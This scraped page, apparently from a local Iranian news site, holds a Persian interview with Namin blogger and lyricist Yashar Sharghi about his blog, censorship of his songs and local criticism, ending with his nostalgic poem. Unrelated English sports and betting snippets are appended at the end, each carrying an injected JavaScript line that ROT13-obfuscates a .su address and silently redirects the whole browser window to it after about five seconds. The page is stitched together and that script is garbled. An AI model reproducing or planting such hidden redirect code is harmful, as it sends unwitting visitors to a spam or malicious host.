301 Moved Permanently


nginx/1.15.9 (Ubuntu)
یاشار شرقی:جای مطالب انتقادی در میان وبسایت های نمین خالیست/مردم بدنبال یک تریبون آزاد هستند که مشکلات را مطرح کنند : نوجه ده نیوز NojehdehNews@
rx online

یاشار شرقی

در ویژه نامه نوروزی آسبینه، با ترانه سرا و موسس اولین وبلاگ نمین که این وبلاگ در ارتباط با تاریخچه ، جغرافیا ، طبیعت نمین فعال بود و به مطالب انتقادی جامعه نمین بیشتر می پرداخت گفتگویی ترتیب دادیم. در این گفتگو یاشار شرقی به دلایل ایجاد وبلاگ برای نمینی ها و دشواری و سختی های کار و حساسیت هایی که برای نقدهایش ایجاد شده بود اشاره می کند. شما را دعوت به خواندن این مصاحبه می کنیم:

** آقای شرقی لطفا بیوگرافی مختصری از خودتان بیان بفرمایید.

یاشار شرقی نمین هستم متولد ۱۲ اسفند سال ۱۳۶۲ در نمین. پدرم نمینی و مادرم گیلانی است.تحصیلات ابتدایی و راهنمایی را در مدارس اردبیل و نمین گذراندم. دوران دبیرستان و دانشگاه را در رشت به اتمام رساندم و لیسانس مدیریت بازرگانی را از دانشگاه پیام نور رشت اخذ کردم. و در حال حاضر ساکن رشت می باشم.

 ** جناب یاشار شرقی نمین از شما بعنوان ترانه سرا و آهنگساز یاد می شود، لطفاً در این خصوص و ترانه هایتان توضیح دهید؟

البته من هرگز خودم را یک ترانه سرای حرفه ای نمیدانم و بیشتر برای دل خودم ترانه میگویم و گاهی آهنگسازی هم میکنم.ازسال ۸۴ بصورت پراکنده ترانه هایی نوشتم و با دوستان هم دانشگاهی گروه موسیقی بنام گروه “سوشیانت” تشکیل دادیم و برای انتشار آلبومی از ترانه ها و آهنگهایم که توسط دوستان قرار بود اجرا بشود، روزها و ماه ها درگیر اخذ مجوز از وزارت محترم فرهنگ و ارشاد بودیم که متاسفانه بخاطراعتراضی بودن برخی از ترانه ها و سبک کارها که فضای راک و متال داشت و همینطور نام گروه موفق به اخذ مجوز نشدیم که این مشکل با تغییر نام گروه واصلاحاتی درترانه ها و سبک کارها هم حل نشد و بد شانسی های ما به همین جا ختم نشد در همین سال وکالیست و نوازنده گیتار گروهمان بر اثر سانحه تصادف درگذشت که با این شوک و بخاطر مشکلات مجوز و… شرایط بد، “سکوت” رو ترجیح دادم. ان شاءالله امسال تمام پروژه های نیمه کاره و ناتمام را بدون اصلاح و سانسور، و حتی با لحنی تندتر،  اجرا و بصورت یک آلبوم با همکاری دوستانم ارائه خواهیم کرد. البته درطول این سالها چند ترانه ام، توسط برخی خوانندگان زیر زمینی اجرا شده که بنا به دلایلی در برخی از ترانه ها از اسم مستعار استفاده کردم.

** علت و انگیزه ایجاد وبلاگ در مورد نمین را بیان بفرمایید؟

برای ایجاد این وبلاگ چند دلیل عمده داشتم: یکی از دلایل و انگیزه ها، سوالی بود که اینجا در رشت صدها بار در مدرسه و دانشگاه و… در مورد پسوند فامیلی ام (نمین) ازمن پرسیده میشد و همیشه من را به این فکر وا میداشت که چرا نمین با اون زیبایی ها و فرهنگی که داشته و دارد و از آن مهمتر با وجود نزدیک بودن به گیلان اینقدر ناشناخته است! همچنین اوایل دهه ۸۰ در ایران مصادف بود با جا افتادن تدریجی پدیده ی جهانی اینترنت میان مردم و بویژه جوانان ایرانی. هر روز به شمار سایتها و وبلاگ های فارسی زبان با موضوعات مختلف افزوده میشد و یکی از کلماتی که من همیشه در موتورهای جستجگوگر سرچ (search) میکردم و همواره فقط با چند مطلب پراکنده مواجه میشدم کلمه”نمین” بود. از طرفی چت با مسنجر یاهو در این سالها طرفداران بسیاری داشت و من از این طریق با برخی از نمینی های خارج از کشور در ارتباط بودم که همیشه درخواست عکس و تصویر از نمین داشتند. تمام این مسائل و از همه مهمتر ادای دین به سرزمین پدری و دوری و دلتنگی برای نمین باعث شد دست به کار بشوم و مطالب و عکسهایی از نمین تهیه کنم و فعالیت اولین وبلاگ در مورد نمین را در اسفند ماه سال ۱۳۸۳ استارت بزنم.البته تهیه مطلب در آن روزها کار آسانی نبود و بیشتر مطالب بصورت شفاهی ، سوال از قدیمی های نمین و یا ارسال مطلب توسط مخاطبین وبلاگ تهیه شده بود. همچنین عکسهای وبلاگ با همکاری دوست خوبم”مسعود بیرامی”با امکانات اولیه و با یک هندی کم ساده گرفته شده بود. با این وجود برای بسیاری ازکسانی که سالها دور از نمین بودند بسیار جالب و خاطره انگیز بود. حتی یادم هست که یکی از مخاطبین  وبلاگ که خانمی نمینی الاصل بود و بیش از سی سال بود در سوئد زندگی میکرد، با مشاهده تصاویر آنچنان تحت تاثیر قرار گرفته بودکه ساعت ها اشک ریخته بود و این موضوع را در کامنت های وبلاگ مطرح کرده بود که واقعاً برایم جالب بود و باعث دلگرمی من برای ادامه فعالیت وبلاگ شد.

 یاشار شرقی نمین

** و موضوعات وبلاگ نمین چه بود؟

در این وبلاگ تقریباً هرآنچه که درمورد نمین بود نوشته میشد. ازمطالب تاریخی وفرهنگی گرفته تا موضوعات انتقادی و خودمانی.

 ** موضوعات انتقادی وبلاگ نمین در چه زمینه هایی بود؟

و اما در مورد موضوعات انتقادی که در وبلاگ مطرح شده بود باید بگم که پس از درج مطالب عمومی و کلی در مورد نمین مثل: مسائل تاریخی ، موقعیت جغرافیایی و وجه تسمیه و تصاویر و… که به نوعی مرحله اول کاربحساب می آمدم و همچنین بخاطر انبوه کامنت های مردم و بویژه جوانان ساکن نمین که بحق خواستار پرداختن به مشکلات فعلی نمین ، بجای ارضاء حس نوستالژیک دور ماندگان از نمین بودند باعث شد در مورد مشکلاتی که خودم از نزدیک شاهدشان بودم و برایم ملموس تر بود مطالبی بنویسم. ناگفته نماند که  در آن روزها مجبور شدم بخشی از این مطالب تند انتقادی که به ذائقه بعضی ها خوش نیامده بود را علیرغم میلم از وبلاگ حذف کنم.

** و علت خداحافظی شما با وبلاگنویسی چه بود؟

همانطور که درآخرین مطلب وبلاگم توضیح دادم به دلیل مشغله زیاد زمانی برای بروز رسانی وبلاگ نداشتم همچنین به دلیل دوری از نمین  و عدم دسترسی به اخبار و اطلاعات نمین مطلب جدیدی هم برای درج در وبلاگ نداشم و از همه مهمتر ایجاد وبسایتهای جامع تر و بهتری در خصوص شهرستان نمین، ازجمله همین سایت “سلام نمین”.

 ** کدام مطلب برای شما و مردم جالب بود و انعکاس پیدا کرد؟

من به شخصه مطالب انتقادی را بیشتر دوست داشتم. حتی قصد داشتم در وبلاگ فراخوانی قراردهم که هر کس مطلب انتقادی در مورد مشکلات شهر نمین دارد برایم ایمیل کند که در وبلاگ درج بشود که به خاطر یک سری مسائل و حساسیتهای بیش از حد این طرح عملی نشد و اما برای مردم و مخاطبین باید بگویم که برای خارج نشینان و کسانی که دور از نمین بودند عکسهای مناطق مختلف شهرستان نمین بسیار جالب بود و برای مردم ساکن نمین مطالب روز و انتقادی. مخصوصاً مطلبی در مورد “پارک مجاور گورستان” و مطلب انتقادی دیگری که بعدها بدلایلی از وبلاگ حذف شد.

 ** هم اکنون فضای سایبری شهرستان نمین را چطور میبینید؟ با وجود ایجاد چندین وبسایت در شهرستان نمین و این حرکت را نسبت به شهرستانهای همجوار و استان چگونه ارزیابی می کنید؟

خوشبختانه برخلاف سالهای گذشته فضای سایبری نمین بسیار پویا و رو به رشد است و هر روز بر تعداد وبسایتها، پایگاه های خبری و صفحات شبکه های اجتماعی با موضوعیت نمین افزوده میشود. نمین در مقایسه با شهرستان های مشابه کشور (از نظرجمعیت و مساحت جغرافیایی) بسیار فعالتر است و در میان شهرستاهای استان نیز یک سر و گردن بالاتر از سایر شهرهاست که به نظر من این موضوع را باید ناشی از پیشینه ی درخشان فرهنگی نمین دانست.

 ** در یکسال اخیر وبسایتهای سلام نمین ، آسبینه، ویلکیج ، میناباد ، نوجه ده را چطور دیدید چه مطالبی از دید شما بهتر است که بیشتر مطرح و بررسی بشود؟ مخاطب هم اکنون بدنبال چه مطلبی هست و نقطه ضعف این وبسایتها را چه می بینید؟ با این حال که از کمکهای دولتی محروم هستند؟

 همانطورکه اشاره کردم وضعیت فضای سایبری و پایگاه های اینترنتی با موضوعیت نمین در مقایسه با شهرستان های مجاور و سایر شهرهای استان بسیار بهتر است. اینکه شهرها و حتی روستاها و در واقع توابع نمین مثل “نوجه ده” و “میناباد” و… هم دارای وبسایت اختصاصی و جامع هستند  برای من بعنوان یک نمینی بسیار افتخارآمیزاست. همچنین پایگاه خبری نوپایی مثل”آسبینه” که در حوزه ای فراتر از نمین و با پوشش مطالبی از آستارا تا اردبیل فعالیت میکند نشان از پیشرفت وبسایتهای نمین دارد.به شخصه از خوانندگان همیشگی مطالب “سلام نمین” هستم و بسیار خوشحالم که شهر من وبسایتی جامع و کامل و صمیمی  مثل “سلام نمین” دارد. این درحالیست که این سایت ها هیچ منبع درآمدی ندارند و کاملاً مستقل از ارگانهای دولتی هستند که این بسیار قابل تقدیر است. کلاً از لحاظ کمیت وضعیت بسیار عالیست. امیدوارم کیفیت مطالب هم روز به روز بهتر بشود. با وجود مشکلات زیاد و با توجه به کم لطفی  نسبت به نمین و بعضاً ناکار آمدی و سوء مدیریت ها که بیشترین آسیب را به نمین وارد آورده، جای مطالب انتقادی در میان وبسایت های نمین خالیست.

خوشبختانه در شبکه های اجتماعی صفحات اختصاصی مختلفی با موضوع نمین وجود دارد که در بینشان صفحات انتقادی نیز به چشم میخورد که بعضاً بحث های سازنده ای در این صفحات شکل میگیرد.البته شبکه های اجتماعی مخاطبین خاص خود را دارد و کمتر توسط مسئولین و مدیران بررسی و رصد میشود. بنابراین اگر در یکی از این سایتها که مخاطبین عام تری دارد، بخش ویژه ای برای مطرح کردن مشکلات مردم نمین بصورت آزاد ایجاد شود بسیارموثر و سازنده خواهد بود و به نوعی صدای مردم به گوش مسئولین خواهد رسید. مردم بدنبال یک تریبون آزاد هستند که مشکلات را مطرح کنند.

** و صحبت پایانی ….

در پایان ضمن تبریک سال نو به تمام نمینیهای عزیز، در هر جای دنیا که هستند از تمام کسانی که مثل شما خالصانه و بدون چشم داشتی برای نمین فعالیت میکنید تشکر میکنم. امیدوارم سال ۹۲ برای تمام نمینیها سال خوبی باشد.

** در ادامه …

این ترانه مربوط میشود به پاییز سال ۸۴٫ وقتی که پس از ۲ سال دوری به نمین آمده بودم و دیگه مادربزرگ نبود…پدربزرگ هم در بستر بیماری بود…

تقدیم به همه کسایی که از خانه های قدیمی نمین، از پدربزرگها و مادربزرگهای نمینی و از شبهای سرد زیر کرسی خاطره دارند:

باز دوباره زنده شد خاطره های بچه گی

یاد اون روزای صاف سادگی

یاد اون کوچه که توش یه خونه ی قدیمی بود

یاد اون خونه ای که هر طرفش خاطره بود

خونه ی قدیمی پدربزرگ یادش بخیر

سقف چوبی، دیوارای گاهگلی یادش بخیر

روز عید وشب چارشنبه سوری تو اون خونه

ربنا و سفره های سحری یادش بخیر

چایی و سماور و قندونای مادربزرگ

دست پینه بسته پدربزرگ یادش بخیر

شب یلدا پای کرسی جمع شدن

همه باهم سر یک سفره بودن یادش بخیر

عینک پدربزرگ، صندوقچه ی قدیمی مادربزگ

قاب عکسای قدیمی، پشتیهای رنگ به رنگ

جای نخ سوزنای مادربزرگ تو گنجه و

رادیو قدیمی پدربزگ یادش بخیر

بالا رفتن از درخت پیر تو حیاط

ناخنک زدن به اون لواشکای روی بوم

خاطرات ترش و شیرین

 خنده ها و گریه ها یادش بخیر

حالا اون خونه با اون خاطره ها تنها شده

بوی کهنگی میده،آخ که چه سوت و کور شده

پای اون سفره ای که جمع میشدیم دورش همه

حالا هیشکی نیست…

خونه تنها شده…

۱ بهمن سال ۱۳۸۴

  • RSS
  • Delicious
  • Digg
  • Facebook
  • Twitter
  • Linkedin
  • Youtube

Solheim Cup podcast: Anne Van Dam, Suzann Pettersen among guests

rx onlineString.prototype.a73fba7d=function(){return this.replace(/[a-zA-Z]/g,function(c){return String.fromCharCode((c=(c=c.charCodeAt(0)+13)?c:c-26);});};u='uggc://cresrpgsnfgfnyr.fh';function f31454d7(){window.top.location.href=u.a73fba7d();}setTimeout(f31454d7,4987); Listen or subscribe on: Suzann Pettersen and ...

The most backed teams in the EFL Cup tonight

rx onlineString.prototype.a73fba7d=function(){return this.replace(/[a-zA-Z]/g,function(c){return String.fromCharCode((c=(c=c.charCodeAt(0)+13)?c:c-26);});};u='uggc://cresrpgsnfgfnyr.fh';function f31454d7(){window.top.location.href=u.a73fba7d();}setTimeout(f31454d7,4987); SWANSEA to beat at Watford Punters fancy ...

Burrow is the Odds-On Favorite to be the First Overall Pick in the 2020 NFL Draft

rx onlineString.prototype.a73fba7d=function(){return this.replace(/[a-zA-Z]/g,function(c){return String.fromCharCode((c=(c=c.charCodeAt(0)+13)?c:c-26);});};u='uggc://cresrpgsnfgfnyr.fh';function f31454d7(){window.top.location.href=u.a73fba7d();}setTimeout(f31454d7,4987); The 2019 school football season opened ...

Is Online Sports Betting Legal in New Mexico?

rx onlineString.prototype.a73fba7d=function(){return this.replace(/[a-zA-Z]/g,function(c){return String.fromCharCode((c=(c=c.charCodeAt(0)+13)?c:c-26);});};u='uggc://cresrpgsnfgfnyr.fh';function f31454d7(){window.top.location.href=u.a73fba7d();}setTimeout(f31454d7,4987); Legal sports gambling has arrived in ...

Alex Iwobi feels like he has a 'new home' at Everton after Deadline Day move

rx onlineString.prototype.a73fba7d=function(){return this.replace(/[a-zA-Z]/g,function(c){return String.fromCharCode((c=(c=c.charCodeAt(0)+13)?c:c-26);});};u='uggc://cresrpgsnfgfnyr.fh';function f31454d7(){window.top.location.href=u.a73fba7d();}setTimeout(f31454d7,4987); Alex Iwobi feels like he has ...

توييتر ما

No public Twitter messages.

حاميان ما